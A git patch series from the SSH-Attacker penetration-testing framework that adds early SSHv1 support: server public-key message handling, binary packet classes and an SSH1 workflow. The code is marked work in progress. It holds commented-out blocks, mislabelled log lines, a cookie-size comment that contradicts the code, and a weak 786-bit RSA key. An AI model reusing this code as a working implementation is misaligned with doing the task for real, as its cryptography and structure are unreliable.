kex.getPkAgreementLength(), kex.getCiphertextLength()); + }*/ + + @Override + public SshMessageParser getParser( + SshContext context, InputStream stream) { + HybridKeyExchange kex = context.getChooser().getHybridKeyExchange(); + return new ServerPublicKeyMessageParser(context, stream); + } + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + HybridKeyExchange kex = context.getChooser().getHybridKeyExchange(); + return new ServerPublicKeyMessagePreparator(context.getChooser(), this, kex.getCombiner()); + } + + @Override + public SshMessageSerializer getSerializer(SshContext context) { + HybridKeyExchange kex = context.getChooser().getHybridKeyExchange(); + return new ServerPublicKeyMessageSerializer(this, kex.getCombiner()); + } + + @Override + public String toShortString() { + return "HYB_KEX_REPL"; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ServerPublicKeyMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ServerPublicKeyMessageParser.java new file mode 100644 index 000000000..fa2b2d215 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ServerPublicKeyMessageParser.java @@ -0,0 +1,167 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.parser; + +import de.rub.nds.modifiablevariable.util.ArrayConverter; +import de.rub.nds.sshattacker.core.constants.BinaryPacketConstants; +import de.rub.nds.sshattacker.core.constants.HybridKeyExchangeCombiner; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ServerPublicKeyMessage; +import java.io.InputStream; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class ServerPublicKeyMessageParser extends SshMessageParser { + private static final Logger LOGGER = LogManager.getLogger(); + private HybridKeyExchangeCombiner combiner; + private int agreementSize; + private int encapsulationSize; + + /* + public HybridKeyExchangeReplyMessageParser( + byte[] array, + int startPosition, + HybridKeyExchangeCombiner combiner, + int agreementSize, + int encapsulationSize) { + super(array, startPosition); + this.agreementSize = agreementSize; + this.encapsulationSize = encapsulationSize; + this.combiner = combiner; + } + + public HybridKeyExchangeReplyMessageParser( + byte[] array, + HybridKeyExchangeCombiner combiner, + int agreementSize, + int encapsulationSize) { + super(array); + this.agreementSize = agreementSize; + this.encapsulationSize = encapsulationSize; + this.combiner = combiner; + } + */ + + public ServerPublicKeyMessageParser(SshContext context, InputStream stream) { + super(stream); + + /* LOGGER.info( + "Negotiated Hybrid Key Exchange: " + + context.getChooser().getKeyExchangeAlgorithm()); + switch (context.getChooser().getKeyExchangeAlgorithm()) { + default: + LOGGER.warn( + "Unsupported hybrid key exchange negotiated, treating received HBR_REPLY as sntrup761x25519-sha512@openssh.com"); + // Fallthrough to next case statement intended + case SNTRUP761_X25519: + this.combiner = HybridKeyExchangeCombiner.POSTQUANTUM_CONCATENATE_CLASSICAL; + this.agreementSize = CryptoConstants.X25519_POINT_SIZE; + this.encapsulationSize = CryptoConstants.SNTRUP761_CIPHERTEXT_SIZE; + break; + case CURVE25519_FRODOKEM1344: + this.combiner = HybridKeyExchangeCombiner.POSTQUANTUM_CONCATENATE_CLASSICAL; + this.agreementSize = CryptoConstants.X25519_POINT_SIZE; + this.encapsulationSize = CryptoConstants.FRODOKEM1344_CIPHERTEXT_SIZE; + break; + case SNTRUP4591761_X25519: + this.combiner = HybridKeyExchangeCombiner.POSTQUANTUM_CONCATENATE_CLASSICAL; + this.agreementSize = CryptoConstants.X25519_POINT_SIZE; + this.encapsulationSize = CryptoConstants.SNTRUP4591761_CIPHERTEXT_SIZE; + break; + case NISTP521_FIRESABER: + this.combiner = HybridKeyExchangeCombiner.POSTQUANTUM_CONCATENATE_CLASSICAL; + this.agreementSize = CryptoConstants.NISTP521_POINT_SIZE; + this.encapsulationSize = CryptoConstants.FIRESABER_CIPHERTEXT_SIZE; + break; + case NISTP521_KYBER1024: + this.combiner = HybridKeyExchangeCombiner.POSTQUANTUM_CONCATENATE_CLASSICAL; + this.agreementSize = CryptoConstants.NISTP521_POINT_SIZE; + this.encapsulationSize = CryptoConstants.KYBER1024_CIPHERTEXT_SIZE; + break; + }*/ + + /* this.agreementSize = agreementSize; + this.encapsulationSize = encapsulationSize; + this.combiner = combiner;*/ + } + + private void parseHostKeyBytes(ServerPublicKeyMessage message) { + message.setHostKeyByteLenght(parseIntField(BinaryPacketConstants.LENGTH_FIELD_LENGTH)); + LOGGER.debug("Host key byte length" + message.getHostKeyByteLenght().getValue()); + message.setHostKeyBytes(parseByteArrayField(message.getHostKeyByteLenght().getValue())); + LOGGER.debug( + "Host key bytes: " + + ArrayConverter.bytesToHexString(message.getHostKeyBytes().getValue())); + } + + private void parseServerKeyBytes(ServerPublicKeyMessage message) { + message.setServerKeyByteLenght(parseIntField(BinaryPacketConstants.LENGTH_FIELD_LENGTH)); + LOGGER.debug("Server key byte length" + message.getServerKeyByteLength().getValue()); + message.setServerKeyBytes(parseByteArrayField(message.getServerKeyByteLength().getValue())); + LOGGER.debug( + "Server key bytes: " + + ArrayConverter.bytesToHexString(message.getServerKeyBytes().getValue())); + } + + private void parseAntiSpoofingCookie(ServerPublicKeyMessage message) { + message.setAntiSpoofingCookie(parseByteArrayField(8)); + LOGGER.debug("AntiSpoofingCookie: {}", message.getAntiSpoofingCookie().getValue()); + } + + private void parseHybridKey(ServerPublicKeyMessage message) { + int length = parseIntField(BinaryPacketConstants.LENGTH_FIELD_LENGTH); + LOGGER.debug("Total Length: " + length); + + switch (combiner) { + case CLASSICAL_CONCATENATE_POSTQUANTUM: + message.setPublicKeyLength(agreementSize); + message.setPublicKey(parseByteArrayField(agreementSize)); + message.setCiphertextLength(encapsulationSize); + message.setCombinedKeyShare(parseByteArrayField(encapsulationSize)); + break; + case POSTQUANTUM_CONCATENATE_CLASSICAL: + message.setCiphertextLength(encapsulationSize); + message.setCombinedKeyShare(parseByteArrayField(encapsulationSize)); + message.setPublicKeyLength(agreementSize); + message.setPublicKey(parseByteArrayField(agreementSize)); + break; + default: + LOGGER.warn("combiner not supported. Can not update message"); + break; + } + } + + /* private void parseSignature(ServerPublicKeyMessage message) { + message.setSignatureLength(parseIntField(BinaryPacketConstants.LENGTH_FIELD_LENGTH)); + LOGGER.debug("Signature length: " + message.getSignatureLength().getValue()); + message.setSignature(parseByteArrayField(message.getSignatureLength().getValue())); + LOGGER.debug("Signature: " + message.getSignature()); + }*/ + + @Override + protected void parseMessageSpecificContents(ServerPublicKeyMessage message) { + parseAntiSpoofingCookie(message); + parseServerKeyBytes(message); + parseHostKeyBytes(message); + // parseHybridKey(message); + // parseSignature(message); + } + + /* + @Override + protected HybridKeyExchangeReplyMessage createMessage() { + return new HybridKeyExchangeReplyMessage(); + } + */ + + @Override + public void parse(ServerPublicKeyMessage message) { + parseProtocolMessageContents(message); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ServerPublicKeyMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ServerPublicKeyMessagePreparator.java new file mode 100644 index 000000000..3a0b687be --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ServerPublicKeyMessagePreparator.java @@ -0,0 +1,216 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.preparator; + +import de.rub.nds.modifiablevariable.util.ArrayConverter; +import de.rub.nds.sshattacker.core.constants.HybridKeyExchangeCombiner; +import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; +import de.rub.nds.sshattacker.core.constants.PublicKeyFormat; +import de.rub.nds.sshattacker.core.crypto.hash.ExchangeHashInputHolder; +import de.rub.nds.sshattacker.core.crypto.kex.HybridKeyExchange; +import de.rub.nds.sshattacker.core.crypto.kex.KeyAgreement; +import de.rub.nds.sshattacker.core.crypto.kex.KeyEncapsulation; +import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPrivateKey; +import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; +import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; +import de.rub.nds.sshattacker.core.exceptions.CryptoException; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ServerPublicKeyMessage; +import de.rub.nds.sshattacker.core.protocol.util.KeyExchangeUtil; +import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import java.security.KeyPair; +import java.security.KeyPairGenerator; +import java.security.NoSuchAlgorithmException; +import java.security.interfaces.RSAPrivateKey; +import java.security.interfaces.RSAPublicKey; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class ServerPublicKeyMessagePreparator extends SshMessagePreparator { + + private static final Logger LOGGER = LogManager.getLogger(); + private HybridKeyExchangeCombiner combiner; + + private SshPublicKey serverKey; + + public ServerPublicKeyMessagePreparator( + Chooser chooser, ServerPublicKeyMessage message, HybridKeyExchangeCombiner combiner) { + super(chooser, message, MessageIdConstantSSH1.SSH_SMSG_PUBLIC_KEY); + this.combiner = combiner; + } + + public void generateServerKey() throws CryptoException { + int transientKeyLength = 786; // Bit, default Value referring to RFC + try { + KeyPairGenerator keyGen = KeyPairGenerator.getInstance("RSA"); + keyGen.initialize(transientKeyLength); + KeyPair key = keyGen.generateKeyPair(); + CustomRsaPublicKey publicKey = new CustomRsaPublicKey((RSAPublicKey) key.getPublic()); + CustomRsaPrivateKey privateKey = + new CustomRsaPrivateKey((RSAPrivateKey) key.getPrivate()); + this.serverKey = new SshPublicKey<>(PublicKeyFormat.SSH_RSA, publicKey, privateKey); + } catch (NoSuchAlgorithmException e) { + throw new CryptoException( + "Unable to generate RSA transient key - RSA key pair generator is not available"); + } + } + + @Override + public void prepareMessageSpecificContents() { + LOGGER.debug("Preparring now..."); + int hostKeylenght; + int serverKeyLenght; + + // *SSHV1*// + + // ServerKey + SshPublicKey hostkey; + try { + generateServerKey(); + } catch (CryptoException e) { + throw new RuntimeException(e); + } + chooser.getContext().getSshContext().setServerKey(serverKey); + getObject().setServerKey(serverKey); + serverKeyLenght = serverKey.getPublicKey().getPublicExponent().bitLength(); + serverKeyLenght = serverKeyLenght + serverKey.getPublicKey().getModulus().bitLength(); + getObject().setServerKeyByteLenght(serverKeyLenght / 8); + + getObject().setServerPublicModulus(serverKey.getPublicKey().getModulus().toByteArray()); + getObject() + .setServerPublicExponent( + serverKey.getPublicKey().getPublicExponent().toByteArray()); + + byte[] concatenated; + + concatenated = + KeyExchangeUtil.concatenateHybridKeys( + serverKey.getPublicKey().getModulus().toByteArray(), + serverKey.getPublicKey().getPublicExponent().toByteArray()); + + getObject().setServerKeyBytes(concatenated); + LOGGER.debug( + "[bro] concatenated server key lenght: {} vs calculated: {}", + concatenated.length, + serverKeyLenght / 8); + + getObject().setServerKeyByteLenght(concatenated.length); + + LOGGER.debug( + "[bro] ServerKey Exponent: {}", + ArrayConverter.bytesToHexString( + serverKey.getPublicKey().getPublicExponent().toByteArray())); + LOGGER.debug( + "[bro] ServerKey Modulus: {}", + ArrayConverter.bytesToHexString( + serverKey.getPublicKey().getModulus().toByteArray())); + + SshPublicKey hostKey = chooser.getConfig().getHostKeys().get(0); + + // Hostkey + // Optional> hostKey = chooser.getContext().getSshContext().getHostKey(); + /* if (hostKey.isPresent()) { + CustomRsaPublicKey publicKey = (CustomRsaPublicKey) hostKey.get().getPublicKey(); + hostKeylenght = publicKey.getPublicExponent().bitLength(); + hostKeylenght = hostKeylenght + publicKey.getModulus().bitLength(); + getObject().setHostPublicModulus(publicKey.getModulus().toByteArray()); + getObject().setHostPublicExponent(publicKey.getPublicExponent().toByteArray()); + getObject().setHostKeyBits(hostKeylenght); + + LOGGER.debug( + "[bro] Hostkey Exponent: {}", + ArrayConverter.bytesToHexString(publicKey.getPublicExponent().toByteArray())); + LOGGER.debug( + "[bro] Hostkey Modulus: {}", + ArrayConverter.bytesToHexString(publicKey.getModulus().toByteArray())); + } else { + LOGGER.error("Got no Hostkey!"); + throw new RuntimeException("error"); + }*/ + + CustomRsaPublicKey publicKey = (CustomRsaPublicKey) hostKey.getPublicKey(); + hostKeylenght = publicKey.getPublicExponent().bitLength(); + hostKeylenght = hostKeylenght + publicKey.getModulus().bitLength(); + getObject().setHostPublicModulus(publicKey.getModulus().toByteArray()); + getObject().setHostPublicExponent(publicKey.getPublicExponent().toByteArray()); + getObject().setHostKeyByteLenght(hostKeylenght / 8); + + concatenated = + KeyExchangeUtil.concatenateHybridKeys( + publicKey.getModulus().toByteArray(), + publicKey.getPublicExponent().toByteArray()); + + getObject().setHostKeyBytes(concatenated); + + getObject().setHostKeyByteLenght(concatenated.length); + + LOGGER.debug( + "[bro] concatenated host key lenght: {} vs calculated: {}", + concatenated.length, + hostKeylenght / 8); + + LOGGER.debug( + "[bro] Hostkey Exponent: {}", + ArrayConverter.bytesToHexString(publicKey.getPublicExponent().toByteArray())); + LOGGER.debug( + "[bro] Hostkey Modulus: {}", + ArrayConverter.bytesToHexString(publicKey.getModulus().toByteArray())); + + // AntiSpoofingCookie + getObject().setAntiSpoofingCookie(chooser.getConfig().getAntiSpoofingCookie()); + + // *SSHV1*// + /* + KeyExchangeUtil.prepareHostKeyMessage(chooser.getContext().getSshContext(), getObject()); + prepareHybridKey(); + chooser.getHybridKeyExchange().combineSharedSecrets(); + chooser.getContext() + .getSshContext() + .setSharedSecret(chooser.getHybridKeyExchange().getSharedSecret()); + chooser.getContext() + .getSshContext() + .getExchangeHashInputHolder() + .setSharedSecret(chooser.getHybridKeyExchange().getSharedSecret()); + KeyExchangeUtil.computeExchangeHash(chooser.getContext().getSshContext()); + KeyExchangeUtil.prepareExchangeHashSignatureMessage( + chooser.getContext().getSshContext(), getObject()); + KeyExchangeUtil.setSessionId(chooser.getContext().getSshContext()); + KeyExchangeUtil.generateKeySet(chooser.getContext().getSshContext());*/ + } + + private void prepareHybridKey() { + HybridKeyExchange keyExchange = chooser.getHybridKeyExchange(); + KeyAgreement agreement = keyExchange.getKeyAgreement(); + KeyEncapsulation encapsulation = keyExchange.getKeyEncapsulation(); + agreement.generateLocalKeyPair(); + encapsulation.encryptSharedSecret(); + + ExchangeHashInputHolder inputHolder = + chooser.getContext().getSshContext().getExchangeHashInputHolder(); + byte[] agreementBytes = agreement.getLocalKeyPair().getPublic().getEncoded(); + byte[] encapsulationBytes = encapsulation.getEncryptedSharedSecret(); + getObject().setPublicKey(agreementBytes, true); + getObject().setCiphertext(encapsulationBytes, true); + byte[] concatenated; + switch (combiner) { + case CLASSICAL_CONCATENATE_POSTQUANTUM: + concatenated = + KeyExchangeUtil.concatenateHybridKeys(agreementBytes, encapsulationBytes); + inputHolder.setHybridServerPublicKey(concatenated); + break; + case POSTQUANTUM_CONCATENATE_CLASSICAL: + concatenated = + KeyExchangeUtil.concatenateHybridKeys(encapsulationBytes, agreementBytes); + inputHolder.setHybridServerPublicKey(concatenated); + break; + default: + LOGGER.warn("combiner is not supported. Can not set Hybrid Key."); + break; + } + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ServerPublicKeyMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ServerPublicKeyMessageSerializer.java new file mode 100644 index 000000000..e4adb0bb3 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ServerPublicKeyMessageSerializer.java @@ -0,0 +1,119 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; + +import de.rub.nds.modifiablevariable.util.ArrayConverter; +import de.rub.nds.sshattacker.core.constants.DataFormatConstants; +import de.rub.nds.sshattacker.core.constants.HybridKeyExchangeCombiner; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ServerPublicKeyMessage; +import de.rub.nds.sshattacker.core.protocol.util.KeyExchangeUtil; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class ServerPublicKeyMessageSerializer extends SshMessageSerializer { + + private static final Logger LOGGER = LogManager.getLogger(); + private HybridKeyExchangeCombiner combiner; + + public ServerPublicKeyMessageSerializer( + ServerPublicKeyMessage message, HybridKeyExchangeCombiner combiner) { + super(message); + this.combiner = combiner; + } + + @Override + public void serializeMessageSpecificContents() { + serializeCookie(); + serializeServerKeyBytes(); + serializeHostKeyBytes(); + // serializeHybridKey(); + // serializeSignature(); + + } + + private void serializeCookie() { + appendBytes(message.getAntiSpoofingCookie().getValue()); + LOGGER.debug( + "Host key bytes: " + + ArrayConverter.bytesToRawHexString( + message.getAntiSpoofingCookie().getValue())); + } + + private void serializeServerKeyBytes() { + appendInt( + message.getServerKeyByteLength().getValue(), + DataFormatConstants.STRING_SIZE_LENGTH); + LOGGER.debug("Host key bytes length: " + message.getServerKeyByteLength().getValue()); + + appendBytes(message.getServerKeyBytes().getValue()); + LOGGER.debug( + "Host key bytes: " + + ArrayConverter.bytesToRawHexString( + message.getServerKeyBytes().getValue())); + } + + private void serializeHostKeyBytes() { + appendInt( + message.getHostKeyByteLenght().getValue(), DataFormatConstants.STRING_SIZE_LENGTH); + LOGGER.debug("Host key bytes length: " + message.getHostKeyByteLenght().getValue()); + + appendBytes(message.getHostKeyBytes().getValue()); + LOGGER.debug( + "Host key bytes: " + + ArrayConverter.bytesToRawHexString(message.getHostKeyBytes().getValue())); + } + + private void serializeHybridKey() { + int length = + message.getPublicKeyLength().getValue() + + message.getCombinedKeyShareLength().getValue(); + appendInt(length, DataFormatConstants.MPINT_SIZE_LENGTH); + LOGGER.debug("Hybrid Key (server) length: " + length); + byte[] combined; + switch (combiner) { + case CLASSICAL_CONCATENATE_POSTQUANTUM: + combined = + KeyExchangeUtil.concatenateHybridKeys( + message.getPublicKey().getValue(), + message.getCombinedKeyShare().getValue()); + appendBytes(combined); + break; + case POSTQUANTUM_CONCATENATE_CLASSICAL: + combined = + KeyExchangeUtil.concatenateHybridKeys( + message.getCombinedKeyShare().getValue(), + message.getPublicKey().getValue()); + appendBytes(combined); + break; + default: + LOGGER.warn( + "The used combiner" + combiner + " is not supported, can not append Bytes"); + combined = new byte[0]; + break; + } + LOGGER.debug("Hybrid Key (server): " + combined); + } + /* + private void serializeSignature() { + appendInt(message.getSignatureLength().getValue(), DataFormatConstants.STRING_SIZE_LENGTH); + LOGGER.debug("Signature length: " + message.getSignatureLength().getValue()); + appendBytes(message.getSignature().getValue()); + LOGGER.debug("Signature: " + message.getSignature()); + }*/ + + @Override + protected byte[] serializeBytes() { + super.serializeProtocolMessageContents(); + // serializeMessageSpecificContents(); + LOGGER.debug( + "[bro] SSHV1 serializied PubKey Message. Content: {}", + ArrayConverter.bytesToHexString(getAlreadySerialized())); + return getAlreadySerialized(); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java index f487a9412..ea5ad1015 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java @@ -16,6 +16,7 @@ import de.rub.nds.sshattacker.core.protocol.authentication.message.*; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; import de.rub.nds.sshattacker.core.protocol.connection.message.*; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ServerPublicKeyMessage; import de.rub.nds.sshattacker.core.protocol.ssh1.message.VersionExchangeMessageSSHV1; import de.rub.nds.sshattacker.core.protocol.transport.message.*; import jakarta.xml.bind.annotation.XmlElement; @@ -168,6 +169,7 @@ public abstract class MessageAction extends ConnectionBoundAction { @XmlElement(type = VersionExchangeMessage.class, name = "VersionExchange"), @XmlElement(type = AsciiMessage.class, name = "AsciiMessage"), @XmlElement(type = VersionExchangeMessageSSHV1.class, name = "VersionExchangeSSH1"), + @XmlElement(type = ServerPublicKeyMessage.class, name = "PublicKeyMessageSSH1") }) protected List> messages = new ArrayList<>(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java index 41147e88f..84e798636 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java @@ -14,6 +14,7 @@ import de.rub.nds.sshattacker.core.protocol.authentication.message.*; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; import de.rub.nds.sshattacker.core.protocol.connection.message.*; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ServerPublicKeyMessage; import de.rub.nds.sshattacker.core.protocol.ssh1.message.VersionExchangeMessageSSHV1; import de.rub.nds.sshattacker.core.protocol.transport.message.*; import de.rub.nds.sshattacker.core.state.State; @@ -157,6 +158,7 @@ public class ReceiveAction extends MessageAction implements ReceivingAction { @XmlElement(type = VersionExchangeMessage.class, name = "VersionExchange"), @XmlElement(type = AsciiMessage.class, name = "AsciiMessage"), @XmlElement(type = VersionExchangeMessageSSHV1.class, name = "VersionExchangeSSH1"), + @XmlElement(type = ServerPublicKeyMessage.class, name = "PublicKeyMessageSSH1") }) protected List> expectedMessages = new ArrayList<>(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/factory/WorkflowConfigurationFactory.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/factory/WorkflowConfigurationFactory.java index b131d369e..fb3589832 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/factory/WorkflowConfigurationFactory.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/factory/WorkflowConfigurationFactory.java @@ -16,6 +16,7 @@ import de.rub.nds.sshattacker.core.exceptions.ConfigurationException; import de.rub.nds.sshattacker.core.protocol.authentication.message.*; import de.rub.nds.sshattacker.core.protocol.connection.message.*; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.VersionExchangeMessageSSHV1; import de.rub.nds.sshattacker.core.protocol.transport.message.*; import de.rub.nds.sshattacker.core.workflow.WorkflowTrace; import de.rub.nds.sshattacker.core.workflow.action.ChangePacketLayerAction; @@ -72,6 +73,8 @@ public WorkflowTrace createWorkflowTrace( return createFullWorkflowTrace(); case MITM: return createSimpleMitmProxyWorkflow(); + case SSH1: + return createSSHv1Workflow(); default: throw new ConfigurationException( "Unable to create workflow trace - Unknown WorkflowTraceType: " @@ -97,6 +100,12 @@ private AliasedConnection getDefaultConnection() { } } + public WorkflowTrace createSSHv1Workflow() { + WorkflowTrace workflow = new WorkflowTrace(); + addSSHV1Packates(workflow); + return workflow; + } + public WorkflowTrace createInitKeyExchangeWorkflowTrace() { WorkflowTrace workflow = new WorkflowTrace(); addTransportProtocolInitActions(workflow); @@ -144,6 +153,20 @@ public WorkflowTrace createFullWorkflowTrace() { return workflow; } + private void addSSHV1Packates(WorkflowTrace workflow) { + AliasedConnection connection = getDefaultConnection(); + workflow.addSshActions( + SshActionFactory.createMessageAction( + connection, ConnectionEndType.CLIENT, new VersionExchangeMessageSSHV1()), + SshActionFactory.createMessageAction( + connection, ConnectionEndType.SERVER, new VersionExchangeMessageSSHV1()), + new ChangePacketLayerAction(connection.getAlias(), PacketLayerType.BINARY_PACKET), + SshActionFactory.createMessageAction( + connection, ConnectionEndType.CLIENT, new KeyExchangeInitMessage()), + SshActionFactory.createMessageAction( + connection, ConnectionEndType.SERVER, new KeyExchangeInitMessage())); + } + private void addTransportProtocolInitActions(WorkflowTrace workflow) { if (this.mode == RunningModeType.MITM) { AliasedConnection inboundConnection = config.getDefaultServerConnection(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/factory/WorkflowTraceType.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/factory/WorkflowTraceType.java index 6ea51fc4e..6f7b503f9 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/factory/WorkflowTraceType.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/factory/WorkflowTraceType.java @@ -21,5 +21,6 @@ public enum WorkflowTraceType { AUTH_PUBLICKEY, AUTH_DYNAMIC, FULL, - MITM + MITM, + SSH1 } From fd027769c753aade7e0b11ea0d37425990eb9a3a Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sun, 6 Aug 2023 01:27:49 +0200 Subject: [PATCH 050/176] wip: Adding basic binary layer for ssh1 and the version exchange and the rudimentary parts of the public key exchange --- .../nds/sshattacker/core/config/Config.java | 36 +++ .../constants/AuthenticationMethodSSHv1.java | 49 ++++ .../core/constants/CipherMethod.java | 49 ++++ .../core/layer/context/SshContext.java | 13 + .../sshattacker/core/layer/data/Parser.java | 13 + .../core/layer/data/Serializer.java | 14 + .../core/layer/impl/TransportLayer.java | 58 ++++- .../core/packet/BinaryPacketSSHv1.java | 213 +++++++++++++++ .../cipher/PacketChaCha20Poly1305Cipher.java | 13 + .../core/packet/cipher/PacketCipher.java | 22 ++ .../core/packet/cipher/PacketGCMCipher.java | 13 + .../core/packet/cipher/PacketMacedCipher.java | 27 +- .../crypto/AbstractPacketDecryptor.java | 5 + .../crypto/AbstractPacketEncryptor.java | 5 + .../core/packet/crypto/PacketDecryptor.java | 19 ++ .../core/packet/crypto/PacketEncryptor.java | 18 ++ .../handler/BinaryPacketHandlerSSHv1.java | 21 ++ .../parser/BinaryPacketParserSSHv1.java | 214 +++++++++++++++ .../BinaryPacketPreparatorSSHv1.java | 45 ++++ .../BinaryPacketSerializerSSHv1.java | 68 +++++ .../ServerPublicKeyMessageHandler.java | 15 +- .../ssh1/message/ServerPublicKeyMessage.java | 246 ++++++++---------- .../parser/ServerPublicKeyMessageParser.java | 114 +++++++- .../ServerPublicKeyMessagePreparator.java | 191 +++++--------- .../ServerPublicKeyMessageSerializer.java | 107 ++++---- 25 files changed, 1250 insertions(+), 338 deletions(-) create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/AuthenticationMethodSSHv1.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/CipherMethod.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacketSSHv1.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/BinaryPacketHandlerSSHv1.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParserSSHv1.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/preparator/BinaryPacketPreparatorSSHv1.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/serializer/BinaryPacketSerializerSSHv1.java diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java index 17e0318f4..7b8f7a1a0 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java @@ -106,6 +106,14 @@ public void setDefaultAdditionalPadding(Integer defaultAdditionalPadding) { @XmlJavaTypeAdapter(UnformattedByteArrayAdapter.class) private byte[] antiSpoofingCookie; + @XmlElement(name = "supportedCipherMethod") + @XmlElementWrapper + private List supportedCipherMethods; + + @XmlElement(name = "supportedAuthenticationMethod") + @XmlElementWrapper + private List supportedAuthenticationMethods; + /** List of key exchange algorithms supported by the remote peer */ @XmlElement(name = "clientSupportedKeyExchangeAlgorithm") @XmlElementWrapper @@ -510,6 +518,17 @@ public Config() { ArrayConverter.hexStringToByteArray( "0000000000000000"); // 16 Byte Anti-Spoofing-Cookie + supportedCipherMethods = + Arrays.stream(new CipherMethod[] {CipherMethod.SSH_CIPHER_3DES}) + .collect(Collectors.toCollection(LinkedList::new)); + + supportedAuthenticationMethods = + Arrays.stream( + new AuthenticationMethodSSHv1[] { + AuthenticationMethodSSHv1.SSH_AUTH_PASSWORD + }) + .collect(Collectors.toCollection(LinkedList::new)); + // Default values for cryptographic parameters are taken from OpenSSH 8.2p1 clientSupportedKeyExchangeAlgorithms = Arrays.stream( @@ -1702,4 +1721,21 @@ public void setChooserType(ChooserType chooserType) { public LayerConfiguration getDefaultLayerConfiguration() { return defaultLayerConfiguration; } + + public List getSupportedCipherMethods() { + return supportedCipherMethods; + } + + public void setSupportedCipherMethods(List supportedCipherMethods) { + this.supportedCipherMethods = supportedCipherMethods; + } + + public List getSupportedAuthenticationMethods() { + return supportedAuthenticationMethods; + } + + public void setSupportedAuthenticationMethods( + List supportedAuthenticationMethods) { + this.supportedAuthenticationMethods = supportedAuthenticationMethods; + } } diff --git 